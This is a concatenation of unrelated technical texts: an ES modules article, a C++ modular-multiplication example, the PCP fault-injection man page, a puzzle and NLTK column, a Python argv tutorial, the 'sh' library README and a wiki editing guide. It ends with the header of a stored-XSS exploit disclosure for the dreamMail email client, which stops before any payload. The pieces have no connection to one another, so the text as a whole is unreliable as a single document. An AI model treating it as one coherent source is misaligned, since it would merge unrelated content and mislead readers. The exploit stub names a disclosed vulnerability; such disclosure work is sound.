16 Aug 2013: Vulnerability reported to vendor. Provided complete list of payloads.
19 Aug 2013: Still no response. Sent second e-mail.
22 Aug 2013: Got a reply but not from development guy. He seems MIA according to contact.
No longer supported due to missing development guy.
23 Aug 2013: Still nothing.
24 Aug 2013: Release
'''
import smtplib, urllib2
payload = '''
'''
def sendMail(dstemail, frmemail, smtpsrv, username, password):
msg = "From: hacker@offsec.local\n"
msg += "To: victim@offsec.local\n"
msg += 'Date: Today\r\n'
msg += "Subject: XSS payload\n"
msg += "Content-type: text/html\n\n"
msg += payload + "\r\n\r\n"
server = smtplib.SMTP(smtpsrv)
server.login(username,password)
try:
server.sendmail(frmemail, dstemail, msg)
except Exception, e:
print "[-] Failed to send email:"
print "[*] " + str(e)
server.quit()
username = "acker@offsec.local"
password = "123456"
dstemail = "victim@offsec.local"
frmemail = "acker@offsec.local"
smtpsrv = "xxx.xxx.xxx.xxx"
print "[*] Sending Email"
sendMail(dstemail, frmemail, smtpsrv, username, password)
'''
List of XSS types and different syntaxes to which the client is vulnerable.
Each payload will pop a message box, usually with the message "XSS" inside.
Payload: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}
Payload:
Payload:
Payload:
'''
Angular UI Tabs
Install
$ npm install @pevil/ng-tabs
Usage
Import
First, import the provided module:
import { NgTabModule } from '@pevil/ng-tabs';

@NgModule({
  imports: [NgTabModule]
})
export class Module {}
Building a set of tabs
3 directives are provided:
- pvlTabGroup
- pvlTab
- pvlTabPanel
First, an example of how to use them together, with more detail below
<ul pvlTabGroup [tabPanel]="characterPanel">
  <li pvlTab [tabId]="'a'">
    View A
    <ng-template><a-component></a-component></ng-template>
  </li>
  <li pvlTab [tabId]="'b'">
    View B
    <ng-template><b-component></b-component></ng-template>
  </li>
  <li pvlTab [tabId]="'c'">
    View C
    <ng-template><img [src]="c" /></ng-template>
  </li>
</ul>
<div>some other optional content that maybe you want to place before the tab panel</div>
<ng-template pvlTabPanel #characterPanel="pvlTabPanel"></ng-template>
For a more concrete example, see here or here
pvlTabGroup
Use this to define a group of tabs that belong together. Here, we're defining a ul element as the group, where each child with the pvlTab directive (in this case each li element) is a part of this tabGroup.
The [tabPanel] input expects a reference to the panel where we want to render these tabs. The optional [initialTab] input expects a string matching the tabId of whichever tab should be displayed first. If none is provided, the first tab's contents will be the default.
pvlTab
As described above, we want to apply the pvlTab directive to each element that describes a tab. In this case we have three li elements, where the tabs themselves will display [View A, View B, View C]. Each element with a pvlTab directive also uses an ng-template to define the data that should be rendered in the panel when the tab is selected.
The [tabId] input expects a string id, unique to the other tabs in this tab group.
Whichever tab is active will have the css class .pvl-active-tab applied to it.
pvlTabPanel
Apply this to an element, wherever you want the content defined by each tab to render. Also remember to grab a reference to the directive, in order to pass it as an input to the tabGroup directive (in our example, we did that with #characterPanel="pvlTabPanel").
Run local demo by:
- Cloning the repo
- Run $ npm run build.all
- cd demo
- python3 -m http.server 4300
- open localhost:4300 in a browser
The Ajax Control Toolkit is now available from NuGet. This makes it super easy to add the latest version of the Ajax Control Toolkit to any Web Forms application.
If you haven’t used NuGet yet, then you are missing out on a great tool which you can use with Visual Studio to add new features to an application. You can use NuGet with both ASP.NET MVC and ASP.NET Web Forms applications. NuGet is compatible with both Websites and Web Applications and it works with both C# and VB.NET applications.
For example, I habitually use NuGet to add the latest version of ELMAH, Entity Framework, jQuery, jQuery UI, and jQuery Templates to applications that I create. To download NuGet, visit the NuGet website at:
Imagine, for example, that you want to take advantage of the Ajax Control Toolkit RoundedCorners extender to create cross-browser compatible rounded corners in a Web Forms application.
Installing the Ajax Control Toolkit makes several modifications to your application. First, a reference to the Ajax Control Toolkit is added to your application. In a Web Application Project, you can see the new reference in the References folder:
Installing the Ajax Control Toolkit NuGet package also updates your Web.config file. The tag prefix ajaxToolkit is registered so that you can easily use Ajax Control Toolkit controls within any page without adding a @Register directive to the page.
<configuration>
  <system.web>
    <compilation debug="true" targetFramework="4.0" />
    <pages>
      <controls>
        <add tagPrefix="ajaxToolkit" assembly="AjaxControlToolkit"
             namespace="AjaxControlToolkit" />
      </controls>
    </pages>
  </system.web>
</configuration>
You should do a rebuild of your application by selecting the Visual Studio menu option Build, Rebuild Solution so that Visual Studio picks up on the new controls (You won’t get Intellisense for the Ajax Control Toolkit controls until you do a build).
After you add the Ajax Control Toolkit to your application, you can start using any of the 40 Ajax Control Toolkit controls in your application (see for a reference for the controls).
<%@ Page Language="C#" %>
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>Rounded Corners</title>
    <style type="text/css">
        #pnl1 {
            background-color: gray;
            width: 200px;
            color: White;
            font: 14pt Verdana;
        }
        #pnl1_contents {
            padding: 10px;
        }
    </style>
</head>
<body>
    <form id="form1" runat="server">
    <div>
        <asp:Panel ID="pnl1" runat="server">
            <div id="pnl1_contents">
                I have rounded corners!
            </div>
        </asp:Panel>
        <ajaxToolkit:ToolkitScriptManager ID="tsm" runat="server" />
        <ajaxToolkit:RoundedCornersExtender ID="rce" runat="server"
            TargetControlID="pnl1" Radius="8" />
    </div>
    </form>
</body>
</html>
The page contains the following three controls:
- Panel – The Panel control named pnl1 contains the content which appears with rounded corners.
- ToolkitScriptManager – Every page which uses the Ajax Control Toolkit must contain a single ToolkitScriptManager. The ToolkitScriptManager loads all of the JavaScript files used by the Ajax Control Toolkit.
- RoundedCornersExtender – This Ajax Control Toolkit extender targets the Panel control. It makes the Panel control appear with rounded corners. You can control the “roundiness” of the corners by modifying the Radius property.
Notice that you get Intellisense when typing the Ajax Control Toolkit tags. As soon as you type <ajaxToolkit, all of the available Ajax Control Toolkit controls appear:
When you open the page in a browser, then the contents of the Panel appears with rounded corners.
The advantage of using the RoundedCorners extender is that it is cross-browser compatible. It works great with Internet Explorer, Opera, Firefox, Chrome, and Safari even though different browsers implement rounded corners in different ways. The RoundedCorners extender even works with an ancient browser such as Internet Explorer 6.
Getting the Latest Version of the Ajax Control Toolkit
The Ajax Control Toolkit continues to evolve at a rapid pace. We are hard at work fixing bugs and adding new features to the project. We plan to have a new release of the Ajax Control Toolkit each month.
The easiest way to get the latest version of the Ajax Control Toolkit is to use NuGet. You can open the NuGet Add Library Package Reference dialog at any time to update the Ajax Control Toolkit to the latest version.
Meet poor Billy..
Monday's article, the Anti-Estrogens Report Card, was so popular
that some of you asked to hear Billy's story all over again. So here
it is... To understand what happened to poor Billy, in this issue of
EliteFitness.com News, we'll examine estrogen and its relationship to
male use of anabolic steroids - brought to you by EliteFitness.com and
my friend Grendel from Anabolic Extreme.
Also in this week's EFN, we'll look at drugs you can use to annihilate
estrogen in a blinding burst of anabolic goodness! Read on, unless of
course you actually want a career in the exotic dancing arts like our
friend Billy.
Why Billy Has Breasts: The Story of Estrogen!
Before we begin to talk about all the great benefits of anabolic steroids
I think it is important to take a moment to talk about side effects and
how to prevent them. Most of
the actions of estrogens appear to be exerted via the estrogen receptor (ER)
of target cells, an intracellular receptor that is a member of a large super
family of proteins that function as ligand-activated transcription factors,
regulating the synthesis of specific RNAs and proteins. This process is almost
identical to the action by which anabolic steroids affect protein synthesis.
Some steroids, such as trenbolone (Parabolan, or in most people's cases
Finaplex), convert into progesterone.
High dosages of steroids for prolonged periods also shut down the body's
natural production of certain hormones (particularly testosterone) when
steroid therapy is stopped the body attempts to establish homeostasis
by adjusting hormonal levels. The average ratio of testosterone to estrogen
in a healthy male is 100:1. When drugs increase the testosterone in the
body, the body will respond by increasing the estrogen in the body. Additionally,
estrogen circulates in the body bound to the protein SHBG (sex hormone
binding globulin) as does the testosterone. SHBG is produced in the liver
and use of steroids increases the production of this protein; which has
a very high receptor affinity for testosterone. With more SHBG in the
body, more testosterone is bound, becoming inactive as only free testosterone
can activate an androgen receptor. SHBG, however, has poorer receptor
affinity for estrogen and more active free estrogen circulates in the
body, further altering the hormonal balance. These effects of steroids
(i.e. the potential for conversion into estrogen, as well as the disruption
of the hormonal balance in the body) can cause serious side effects in
male users. Thus, steroid users seek ways to block this estrogen from
affecting them.
That is all a very nice and formal way of saying that you need to be taking
anti-estrogens when you are using steroids. See, without the anti-estrogens
you get all sorts of pleasant side effects, not limited to a nice pair of breasts
(with oh -so tender nipples) and extra body fat! Without anti-estrogens you
will end up like poor Billy, shaking his titties in the face of wealthy Japanese
businessmen. No, seriously, this chapter will explore how to effectively use
anti-estrogens to prevent many of the side effects that accompany anabolic
steroid usage.
The Drugs Are Your Friends
Oral clomiphene citrate (Clomid) is an ovulation stimulant used to treat ovulatory
failure in women. Oral tamoxifen citrate (Nolvadex) belongs to a class of antineoplastics
called antiestrogens. It is used to treat breast cancer. Body builders use
both of these drugs. Why on earth would they do that?
The answer is that both of these drugs are anti-estrogens. The term anti-estrogen
is a little inaccurate. This class of pharmaceutical does not engage in some
sort of matter/anti-matter reaction, annihilating estrogen in a blinding burst
of anabolic goodness. Rather, let us think of the classical anti-estrogen drugs
(such as nolvadex and clomid) as estrogen receptor antagonists (ERA). These
ERAs are chemicals that are close enough in structure to estrogen to fit into
the estrogen receptor site; however these chemicals do not have the same chemical
effect as estrogen. The result is that any estrogen produced by the body or
exogenous estrogen cannot find an open receptor site to attach to. The free-floating
estrogen then presents far less problems to homeostasis.
There is a lot of conflict over using nolvadex, clomid and other ERAs. The
regulation of estrogen-induced cellular effects is a multi-step molecular process.
The diversity of estrogen and anti-estrogen effects on cellular functions is
also modulated by tissue and gene specificity. This diversity of reaction may
be explained by different levels of molecular regulation, including the presence
of two distinct estrogen receptor isoforms (ER alpha and ER beta), their binding
to activator or co-repressor transcriptional proteins, and their affinity to
different DNA binding domains of target genes (estrogen responsive element
or API). These mechanisms may account for the specific responses to estrogens
or anti-estrogens according to tissue, cell or gene level.
Therefore, in English, a drug like nolvadex, which targets breast tissues,
is going to do a better job of preventing gynocomastia than is clomid. However
clomid has the benefit of boosting the levels of follicle stimulating hormone,
which helps restore the bodies natural testosterone levels and protects against
testicular atrophy.
Many people stop using their ERA drugs when they end the cycle. That is a terrible
idea. Clomid, as we have already discussed, helps immensely with your recovery
processes. But remember, there is almost always an estrogen backlash to having
been using testosterone drugs for so long. Therefore, many symptoms of high
estrogen levels appear after the cycle. I would continue to use both Clomid
and Nolvadex for up to 3 weeks after the last of the drugs have left your body.
Remember, if on Friday you take 500 mg of a longer acting drug like Sustanon,
then don't consider the following few weeks as truly off time. That is why
it is important to know how long the drugs are effective in your body and yet
another reason to switch to faster acting drugs in the last few weeks of a
cycle.
Effective dosages of these two drugs are debated. I would recommend that
the two drugs be used together, Nolvadex at 20 mg per day, and clomid at
50 mg per day. If Nolvadex is used by itself, 20-40 mg are sufficient. 50-100
mg of clomid can be used if clomid is the only ERA drug. Clomid should be
used for two weeks after the last steroid injection to help return your body
to its natural hormonal state. Nolvadex and Clomid are mildly expensive,
but very available because they are not scheduled drugs and can be legally
imported.
There is a second class of drug used to combat estrogen side effects from
what is grandly called steroid therapy: the aromatase inhibitors.
As mentioned previously in this chapter, the body can convert testosterone
into estrogen using the enzyme aromatase. This second group of drugs, which
I will call the inhibitors, prevents this process from occurring at all.
This class of medication is generally only prescribed for severe conditions
and is generally more expensive then any of the ERA.
Teslac (testolactone) has fallen out of favor for several reasons. First
of all, almost one gram daily is needed to achieve sufficient estrogen
synthesis inhibition. This makes it a very expensive drug to use. Also,
it is currently a scheduled drug because it is a testosterone derivative.
Cytadren (aminoglutethimide) is a better choice, requiring dosages of between
250-500 mg per day to suppress estrogen synthesis. 250mg cytadren doesn't
cause significant desmolase inhibition, so there would still be cortisol
and other steroids, while estrogen is minimized! Cytadren is used therapeutically
to combat Cushing's syndrome because it also interferes with the body's
ability to synthesize cortisol. Sounds like fun, huh ... no cortisol, no
estrogen. What a fantastic environment. Tell that to Andreas Munzer! Cytadren
can cause cysts as well as affect things like blood clotting. It is reported
that Munzer used 1-2g(!) of cytadren/day! Therefore cytadren use should
be done with precision.
Arimidex (anastrozole) is a drug designed to combat second stage breast
cancer. It is an extremely potent drug; one pill per day is sufficient
to almost entirely inhibit estrogen in the body. However, the drawback
is that this one pill per day can cost you around ten dollars.
The final conclusion about inhibitors is that these are far more
powerful drugs than the ERA. All the drugs listed above affect a
much wider hormonal spread than the anti-estrogens and they are also
going to cost you a lot more. Of all the drugs mentioned, I think
that arimidex is the most useful drug for the body builder. Duchaine
helped promote cytadren, particularly because of its anti-catabolic
ability to suppress cortisol. But, even he acknowledged the double-edged
sword that this drug was. Too little cortisol is painful to the joints
and in the end, extremely dangerous. I would not recommend the use
of cytadren, but I have provided the moderate dosage schemes. The bottom
line: These are not drugs to pop like M&Ms.
The Argument Against Our Little Friends
But these drugs decrease your gains right? Damn it. I hate hearing that
phrase clutched to... you guessed it... peoples' breast like a mantra.
First of all, there is no way of telling what your gains would have been
like without nolvadex or clomid. The scientific evidence that gave rise
to this whole dispute (which I believe Duchaine had a hand in too) is that
in addition to its anti-estrogenic action requiring estrogen receptors
(ER) and leading to growth arrest of breast cancers, studies have previously
shown that the anti-hormone tamoxifen (nolvadex) is able to block EGF,
insulin and IGF-I mitogenic activities in total absence of estrogens. Thus
the excessive use of anti-estrogens will actually result in a loss of some
of the most anabolic of hormones (insulin and insulin-like growth factor
1). Steroid antagonists can inhibit not only the action of agonist ligands
of the receptors they are binding to, but can also modulate the action
of growth factors by decreasing their receptor concentrations or altering
their functionality.
Translation: Yes, you are probably compromising your anabolic state
by using ERA. But does that mean they shouldn't be used? No. I have
heard statements so ridiculous as "Don't use anti-estrogens, they cut into
your gains and cost too much. Just get surgery". Lovely, just fucking brilliant.
Sure, like surgery isn't going to cut into your workouts or your gains.
Anti-Estrogens
Let's consider the top drugs used to combat the estrogen-based side effects
of anabolic steroids.
Clomid
Taken daily during a cycle as an anti-estrogen, dosages range between 50-100
mg per day if used exclusively. If combined with Nolvadex, 50 mg per day is
sufficient. For more information on this drug, see the chapter entitled Some
Specific Drugs Considered.
Nolvadex
If used alone then 20-40 mg are needed. Some athletes, because of evidence
that it negatively impacts various growth factors in the body, dislike this
drug. If combined with clomid, 10-20 mg are sufficient. For more information
on this drug, see the chapter entitled Some Specific Drugs Considered.
Proviron
This drug binds to androgen receptors but also helps prevent excess testosterone
from converting into estrogen. I consider this effective when stacked with
either clomid or nolvadex. 1 pill will do if combined with either 50 mg of
clomid or 20 mg of nolvadex. On its own, I suggest at least 2 pills.
Arimidex
This is a very potent drug that prevents the body from converting testosterone
into estrogen. The drawback is that it is very expensive. The minimum effective
dosage is between a quarter and a half of a milligram/day. This drug
does not need to be combined with any other during the cycle; however I recommend
you begin using arimidex two weeks prior to commencing your cycle so that the
drug can effectively eliminate the enzyme that permits conversion of testosterone
to estrogen. Clomid is still useful in the post cycle period. For more information
on this drug, see the chapter entitled Some Specific Drugs Considered.
Remember, anti-estrogens are not scheduled. It is perfectly legal to
import them and there are many online resources that do this with accuracy
and reliability. Don't gamble with this aspect of your health and don't
start until you have all that you need to cover yourself throughout the
whole cycle. There is no excuse for not having plenty of clomid and nolvadex
on hand.
So, back to our fiend Billy. If he had only taken a few simple precautions,
he would not find himself in the predicament he is in now. What has Billy
been up to lately? Well, when last I heard from him, he was working at
the Hooters - and not in the kitchen I might add.
Yours in sport,
George Spellwin. | http://www.elitefitness.com/articledata/efn/032906.html | crawl-001 | refinedweb | 2,177 | 63.49 |
Users of this documentation should be aware that the examples given in the docs are written with the expectation that they are being executed in the REPL, which automatically echoes the result of each expression; a script must print results explicitly. The following gives examples of code that might display this behaviour.
1 + 1         # REPL will print out '2' to console
1 + 1         # Script will not return anything to the console
print(1 + 1)  # Both the REPL and a script will return '2' to the console
import ubinascii
ubinascii.hexlify(b'12345')         # REPL will print out "b'3132333435'" to the console
ubinascii.hexlify(b'12345')         # Script will not return anything to the console
print(ubinascii.hexlify(b'12345'))  # prints the value explicitly
# or save to a variable for later
value = ubinascii.hexlify(b'12345')
# do something here...
print(value)
Rendering this test code, I can reliably crash POVRay.
-----------------------------------------------------------
#include "functions.inc"
global_settings { assumed_gamma 2.2 }
light_source { <0,1,0>*20, rgb <2,2,2>/2 }
light_source { <0.2,1,-0.8>*20, rgb <2,2,2>/1.7 }
#declare m=3;
parametric {
function { u*sin(v) }
function { 15*sqrt(pow(sin(m*v)*sin(u/2)/3,2)+
pow(cos(m*v)*m/u*sin(u/2)/3,2)) }
function { u*cos(v) }
<0.001,0>, <15,2*pi>
contained_by { sphere { 0, 15 } }
precompute 12 x,y,z
accuracy 0.000001
}
camera { location <0,0.3,-1>*8.3 up y look_at <0,0,0> }
-----------------------------------------------------------
The system in question is a Linux-ix86 (AthlonXP) box, compiler
is GCC-3.2.
The bug may not show up on your box because of its nature:
The reason for the bug is uninitialized static data (yeah...).
The following patch will fix it:
----------------------------------------------
diff -urN povray-3.50c/src/fpmetric.cpp povray-3.50c-ww/src/fpmetric.cpp
--- povray-3.50c/src/fpmetric.cpp 2003-01-07 02:08:27.000000000 +0100
+++ povray-3.50c-ww/src/fpmetric.cpp 2003-06-20 23:29:54.000000000 +0200
@@ -124,7 +124,8 @@
static int PrecompLastDepth;
static DBL Intervals_Low[2][32], Intervals_Hi[2][32];
-static int SectorNum[32];
+static int SectorNum[32]={0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
+ 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0};
/*****************************************************************************
@@ -357,7 +358,7 @@
}
/* Z */
- if ((SectorNum[i] < MaxPrecompZ) && (0 < SectorNum[i]))
+ if (SectorNum[i] < MaxPrecompZ)
{
low = PData->Low[2][SectorNum[i]];
hi = PData->Hi[2][SectorNum[i]];
----------------------------------------------
The first chunk simply sets up the static data to sane values.
It is important that these values are non-negative.
The second patch should be reviewed before getting applied.
It removes the check for SectorNum[i] being larger than 0.
The reason why I am including it here is that this looked to me as
if somebody did the most trivial patch for the problem I encountered
but it just cures the symptom, not the bug itself.
Looking at the code, there is no way how SectorNum[i] could get
negative.
Furthermore, the X and Y components do not have such a check,
only the Z component calculation does. Looks odd to me.
The only thing one should consider is that the check will prevent
SectorNum==0 from passing. I see no reason why this would be necessary
but experts should verify that.
Wolfgang
P.S. The code I've just read is a masterpiece of "code duplication".
That's not exactly good and tends to introduce bugs...
Should I post a patch...? | http://news.povray.org/povray.bugreports/thread/%3C3ef6b35d%40news.povray.org%3E/ | crawl-001 | refinedweb | 452 | 51.24 |
The Lines.NET is a logic game that targets the .NET Compact Framework platform and may run under Windows CE.NET 4.0/4.1 and Pocket PC 2002/2003 operating systems.
Fig. 1. Appearance of Lines.NET game in Windows CE.NET emulator
The Lines.NET is an application with rules of traditional "color lines" game that was designed to run on mobile devices in .NET Compact Framework environment. The short description of these rules may be found below.
Fig. 2. Appearance of Lines.NET game in Pocket PC 2002 emulator
A color lines game takes place on a rectangular board with square cells. Usually it is a square board of 9x9 cells. Colored balls are placed on the board in random locations. Traditionally the game starts with 3 balls of random colors (see Fig. 3).
A player can select any ball on the board and move it to a free location if this location can be reached from a current ball's location. Each time player moves a ball 3 new balls appear in random positions on the board that still remain empty. The colors of new balls are randomly selected from a set of 6 (in classical color lines game) different colors.
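The "new balls appear in random positions that still remain empty" rule can be sketched as follows (a simplified illustration, not the game's actual source; the board representation and the function name are assumptions, with 0 marking an empty cell):

```cpp
#include <cstdlib>
#include <vector>
#include <utility>

// Drop a new ball on a random *empty* cell: collect the free cells first,
// then pick one of them, so an occupied cell can never be chosen.
const int BOARD = 9;

bool placeRandomBall(int board[BOARD][BOARD], int color) {
    std::vector<std::pair<int, int>> free_cells;
    for (int r = 0; r < BOARD; ++r)
        for (int c = 0; c < BOARD; ++c)
            if (board[r][c] == 0) free_cells.push_back({r, c});
    if (free_cells.empty()) return false;        // board full: game over
    auto [r, c] = free_cells[std::rand() % free_cells.size()];
    board[r][c] = color;
    return true;
}
```

Picking from the list of free cells (rather than retrying random coordinates until a free one is hit) also makes the "no room left" condition trivial to detect.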
Fig. 3. The traditional color lines playing field
Any ball on the board can be moved from its location to any free cell. The length of a route to reach a new location is unlimited. A ball can only go through empty cells and only in vertical and horizontal directions (see Fig. 4) in order to reach its new location. The ball will not be moved to a free cell if this cell is blocked by surrounding cells, which are occupied by other balls.
Player can move only one ball per step, though the length of this movement is not limited. At the end of each step a new set of balls appear on the board (usually it is a set of 3 balls with random colors).
Fig. 4. A ball can move only in horizontal and vertical directions
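The reachability rule above can be sketched as a breadth-first search over empty cells (a simplified illustration, not the actual Lines.NET code; the board representation and function name are assumptions):

```cpp
#include <array>
#include <queue>
#include <utility>

// Can a ball travel from (sr, sc) to (tr, tc) moving only horizontally and
// vertically through empty cells? Breadth-first search over the free cells.
const int N = 9;

bool reachable(const std::array<std::array<bool, N>, N>& occupied,
               int sr, int sc, int tr, int tc) {
    if (occupied[tr][tc]) return false;          // target must be a free cell
    std::array<std::array<bool, N>, N> seen{};   // zero-initialized
    std::queue<std::pair<int, int>> q;
    q.push({sr, sc});
    seen[sr][sc] = true;
    const int dr[4] = {1, -1, 0, 0};
    const int dc[4] = {0, 0, 1, -1};
    while (!q.empty()) {
        auto [r, c] = q.front();
        q.pop();
        if (r == tr && c == tc) return true;
        for (int k = 0; k < 4; ++k) {
            int nr = r + dr[k], nc = c + dc[k];
            if (nr < 0 || nr >= N || nc < 0 || nc >= N) continue;
            if (seen[nr][nc] || occupied[nr][nc]) continue;
            seen[nr][nc] = true;
            q.push({nr, nc});
        }
    }
    return false;                                // the target cell is blocked
}
```

This is also why a free cell can still be unreachable: if every path of empty cells to it is walled off by balls, the search exhausts the reachable region without hitting the target.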
When balls of the same color compose a line of length 5 or more, this line will be removed from the board, player will be rewarded with score points, and set of new balls will be postponed until the end of a next movement. The lines to remove could be of any direction: horizontal, vertical and even diagonal.
If it happened that two or more crossing lines were completed by the last movement, then all of them will be removed from the game field.
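The check for a completed line in any of the four directions can be sketched like this (an illustration only, not the actual game code; the board representation and names are assumptions, with '.' marking an empty cell):

```cpp
// Count how many same-colored balls pass through (r, c) along direction
// (dr, dc), walking both forward and backward from the placed ball.
const int SIZE = 9;

int runLength(char board[SIZE][SIZE], int r, int c, int dr, int dc) {
    char color = board[r][c];
    int count = 1;
    for (int s = 1; ; ++s) {                      // walk forward
        int nr = r + s * dr, nc = c + s * dc;
        if (nr < 0 || nr >= SIZE || nc < 0 || nc >= SIZE) break;
        if (board[nr][nc] != color) break;
        ++count;
    }
    for (int s = 1; ; ++s) {                      // walk backward
        int nr = r - s * dr, nc = c - s * dc;
        if (nr < 0 || nr >= SIZE || nc < 0 || nc >= SIZE) break;
        if (board[nr][nc] != color) break;
        ++count;
    }
    return count;
}

// A freshly placed ball completes a line if any of the four directions
// (horizontal, vertical, two diagonals) holds 5 or more of its color.
bool completesLine(char board[SIZE][SIZE], int r, int c) {
    const int dirs[4][2] = {{0, 1}, {1, 0}, {1, 1}, {1, -1}};
    for (auto& d : dirs)
        if (runLength(board, r, c, d[0], d[1]) >= 5) return true;
    return false;
}
```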
The player's major goal is to achieve the highest score and get into the "hi score" list of the game. A player is rewarded with 1 point for each movement he or she does. 5 additional points are assigned to the player's score if he/she managed to remove a line of 5 balls by his/her last movement. If the player was able to remove more than 5 balls at once, each extra ball will be rewarded with 2 extra points in arithmetical progression of increment 2. For example,
Thus the longer lines player composes the more points he or she receives, the closer he or she gets to the major goal.
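One possible reading of this scoring rule, sketched in C++ (an interpretation for illustration only, not code from the game; the function name is hypothetical):

```cpp
// Score for removing a line of `balls` same-colored balls: a line of 5
// is worth 5 points, and every extra ball adds 2, 4, 6, ... points
// (an arithmetic progression of increment 2).
int lineScore(int balls) {
    if (balls < 5) return 0;          // lines shorter than 5 are not removed
    int score = 5;
    int bonus = 2;
    for (int extra = balls - 5; extra > 0; --extra) {
        score += bonus;               // 2 extra points, growing by 2 each time
        bonus += 2;
    }
    return score;
}
```

Under this reading a 6-ball line is worth 7 points, a 7-ball line 11, and an 8-ball line 17 — which is the "longer lines pay more" incentive described above.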
However player should be careful with constructing long lines. Though the major goal is to achieve the highest score, the local goal of player is to do not get the board flooded with balls, because if there is no place on the board for new set of ball to appear the game will be over and no more chance to increase a score. Therefore player should try to keep the game board clean and remove lines of reasonable size.
Lines.NET is a "color lines" game that targets mobile devices with Microsoft ® Pocket PC 2002/2003 and Microsoft ® Windows CE.NET 4.0/4.1 operating systems. The key features of Lines.NET are highlighted here:
Before starting an installation process, make sure your mobile device is connected to PC station and connection is established via ActiveSync software. If you don't have ActiveSync installed, get the latest version here:
Download the latest release of .NET Compact Framework redistributable package, run installation process and follow further instructions that will appear during installation. The .NET Compact Framework 1.0 SP2 Redistributable might be found under this link:
You have two ways to install the Lines.NET on your mobile device.
The first one is to install the program from your PC station. Simply run the Lines_NET.exe file from the Lines_NET_install.zip archive and follow the installation instructions. Your mobile device must be connected to the PC station and ActiveSync should be activated. Note that the Lines_NET.CAB file is not needed if you install the application using Lines_NET.exe.
The second way is to copy Lines_NET.CAB file (you may find it in Lines_NET_install.zip archive) to your mobile device manually and then, using file explorer of your mobile device, find the location of copied cabinet file and start installation directly from the device.
The Lines.NET application is built with taking into account the classical MVC (model-view-controller) pattern. All classes of application are split into 4 namespaces.
This is a root namespace of Lines.NET application. It contains all classes that implements GUI forms and dialogs that are used in the game including MainForm class. The MainForm class, in addition to be a representation of a main form of Lines.NET and containing the main entry point for the application, also takes a role of controller by providing intercommunication between Model and View classes. It takes care of handling events from either sides and making decision where to redirect them to. Some other dialogs such as InputBox, AboutBox, HiScoreForm are also located in this namespace.
The only outsider among the classes in this namespace is AppSettings class that holds the currently running game settings and employs Properties class from Lines.Utils namespace to serialize them into settings.xml file on exit and read them from this file during startup. This class provides static getters and setters to all properties of Lines.NET application.
These classes are written for .NET Compact Framework only and cannot be used in .NET Framework environment except maybe AppSettings class. One must rewrite them in order to run the game in .NET Framework environment.
This namespace contains classes that present the core functionality of Lines.NET game. It consists of model classes from the MVC pattern point of view, such as Ball, Board, Game, etc. Classes that enclose game algorithms to find a shortest path and lines compositions on the board are placed here too.
These classes are absolutely independent of .NET Compact Framework specifics and might be freely used in .NET Framework environment.
This namespace contains visual controls that match to classes from the Lines.Core namespace to display them in .NET Compact Framework environment. For instance, BallCtrl is used to visualize a Ball object from the Lines.Core namespace. Note: these classes have some Compact Framework specifics and should be adjusted to be properly used in .NET Framework.
This namespace contains some useful classes that simplify some routine jobs, but don't actually belong to any of the namespaces listed above. One of those is a class to play sound files in the .NET Compact Framework environment, which was adapted from a web site (Sound.cs). Thanks a lot to their developers who shared this code.
Another one might be interesting for your own application. It is a Properties class that provides a functionality to write and read application properties in XML format. The key feature of this class is native type support, so that you don't need to bother yourselves with formatting/parsing/casting strings to native types and vice versa.
PathHelper class, which is also located in this namespace, helps to find and use a location of application directory the application is launched from.
For more details please refer to the Lines.NET API documentation that you can find in "doc" folder of source code file from download section. As an option you may also read C# comments throughout the source code, which are reflected in the documentation.
While programming the Lines.NET game I encountered several issues with the usage of .NET Compact Framework, and sometimes had to resort to ad hoc solutions, because I couldn't find any proper ones.
First of those issues is operating system detection. Though the behavior of .NET Compact Framework applications under Pocket PC 2002/2003 and Windows CE.NET 4.0/4.1 is different, I wasn't able to find out how to programmatically detect the current operating system my application is running on from under .NET Compact Framework. Lines.NET is using a configuration file to define the OS. However I'm sure there must be a way to detect it without this ad hoc workaround.
The good example of different behavior could be a usage of SIP (soft input panel) in Pocket PC version: in order to give a user a possibility to fill up a form a SIP panel is used. SIP panel and button to display it appears on the screen only if the MainMenu object is placed on the form. Thus even though there is no need to have a context menu for a dialog one has to place a dummy MainMenu object, which looks just ugly in Windows CE.NET OS where SIP panel is not needed.
Another example of difference is the MainMenu itself: under Pocket PC 2002/2003 it is placed at the bottom, whereas under Windows CE.NET it is placed at the top of a dialog, and one should always take its size into consideration to place GUI components under the menu. I wasn't able to find a way to detect the height of a MainMenu object, hence again I had to put this property into the configuration file of the application.
The second major problem was revealed while using threads and creating dialogs from a non-main thread. The ball movement runs in a separate thread. By the end of the movement the game field is examined to check whether there is a place on the board for a next step; if there is none, the end-of-game event is fired. The handler of the game-over event displays a game-over dialog and asks the player to enter his or her name in order to save the record. Then a new game is started. That's the ideal scenario, which is supposed to work just fine. However, after the dialog was shown from a side thread, a strange unnamed thread (I could see this while debugging the application) was launched; this happens, though, only when a MainMenu is placed on the displayed dialog. When the player tries to close the application, the termination of this unnamed thread causes some strange runtime exceptions from inside the .NET Compact Framework core. It seems like an internal problem of .NET Compact Framework. In order to get rid of this problem a watchdog timer was used to determine the end of a game and display game-over dialogs from the main thread.
There were a lot more problems, which were successfully resolved while developing Lines.NET.
Fig. 5. Appearance of Lines.NET in real life on a SIMpad device
Although the Lines.NET version 1.1 is released with the whole set of desired features, there are some more features likely to appear in the next versions, such as:
Lines.GUI.Preferences
Even though there are still some things to implement and improve one can already enjoy the game.
The list of devices where Lines.NET game has been successfully tested:
Here is a list of resources which are surely will be useful to anybody who develops applications for .NET Compact Framework platform:
Thanks a lot to my father, whose eagerness to play "color lines" encouraged me to write this application. The Lines.NET game is dedicated to my lovely dad. It is his birthday present from me along with the SIMpad device you may see on Fig. 5. He is the greatest fan of the "color lines" game I've ever seen, though he always lacks a possibility to play it at the time he would like to.
It took me a while to finish with my present, but now I'm fairly glad that my father can enjoy. | https://www.codeproject.com/Articles/7031/Lines-NET-game?msg=825147 | CC-MAIN-2019-30 | refinedweb | 2,088 | 64.81 |
# Controlling Brushless Motors using a Linux computer or a PLC
In this video, we will look at how to connect brushless motor controllers to a Linux computer. Specifically, we will use a computer running Debian. The same steps would work for Ubuntu Linux and other Linux distributions derived from Debian.
I've got a small sensorless brushless motor, and a bigger brushless motor with a built-in absolute encoder. Lets look at how to control those from my Debian Linux computer.
